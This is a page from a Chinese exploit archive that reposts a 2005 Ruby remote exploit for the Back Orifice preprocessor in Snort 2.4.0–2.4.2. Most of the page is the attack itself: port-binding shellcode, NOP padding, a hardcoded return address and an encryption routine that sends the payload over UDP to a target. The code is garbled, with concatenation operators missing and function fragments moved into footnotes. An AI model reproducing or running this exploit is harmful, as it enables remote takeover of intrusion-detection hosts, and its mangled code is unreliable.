首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
0day :: oday

Snort <= 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit (4)


http://www.gipsky.com/
#!/usr/bin/ruby -w

#
#
# Version 0.1 (Public)
#
# snort 2.4.0 - 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit
#
# by xwings at mysec dot org
# URL : http://www.mysec.org , somebody need to update the page
#
# Saying Hi to ....
#
# . All the 1337 c0d3r @ pulltheplug.org
# . Gurus from #rubylang @ freenode.net
# . Skywizard @ somewhere right now
# . HITBSecConf CREW and Team Panda
#
# 03:07 <@mark> hey xwings
# 03:07 <@mark> why don't you come up and see me sometime?
#
# Tested on :
# Linux debian24 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux
# gcc version 3.3.5 (Debian 1:3.3.5-13)
# Snort 2.4.2 , ./configure && make && make install
#
# Use Ruby : http://www.ruby-lang.org
#
#
#

require 'socket'

fathost = ARGV[0]
packetsize = 1069 # ret is 1069
targetport = 9080

boheader = "*!*QWTY?"
[1096].pack("V") # Length ,thanx Russell Sanford
"\xed\xac\xef\x0d" # ID
"\x01" # PING

## Port Bind 3964 . connectback, refer to Russell Sanford's code

shellcode = "\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8"
"\x8e\x30\x01\x83\xeb\xfc\xe2\xf4\xd9\x55\x63\x42\xbb\xe4\x32\x6b"
"\x8e\xd6\xa9\x88\x09\x43\xb0\x97\xab\xdc\x56\x69\xe7\xf2\x56\x52"
"\x61\x6f\x5a\x67\xb0\xde\x61\x57\x61\x6f\xfd\x81\x58\xe8\xe1\xe2"
"\x25\x0e\x62\x53\xbe\xcd\xb9\xe0\x58\xe8\xfd\x81\x7b\xe4\x32\x58"
"\x58\xb1\xfd\x81\xa1\xf7\xc9\xb1\xe3\xdc\x58\x2e\xc7\xfd\x58\x69"
"\xc7\xec\x59\x6f\x61\x6d\x62\x52\x61\x6f\xfd\x81"

filler = "\x90" * (packetsize-(boheader.length shellcode.length))

retadd = [0xbffff370].pack('L')


darthcode = (shellcode filler retadd)

def msrand(seed)
@holdrand = 31337
end

def mrand()
return [1]>>16)&0x7fff)
end

def bocrypt(takepayload)

@arrpayload = (takepayload.split(//))

encpayload ="".to_s
@holdrand=0
msrand(0)

@arrpayload.each do |c|
encpayload =[2] }.join)).to_i.chr
end

return encpayload
end

UDPSocket.open.send(bocrypt(boheader darthcode), 0, fathost, targetport)

[2005-11-11]
附注
  1. (@holdrand=@holdrand*(214013 & 0xffffffff) (2531011 & 0xffffffff
  2. c.unpack("C*").map{ |v| (v^(mrand()%6
<< Snort <= 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit (3) XOOPS (wfdownloads) 2.05 Module Multiple Vulnerabilities Exploit >>
API:
gipsky.com & 安信网络

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号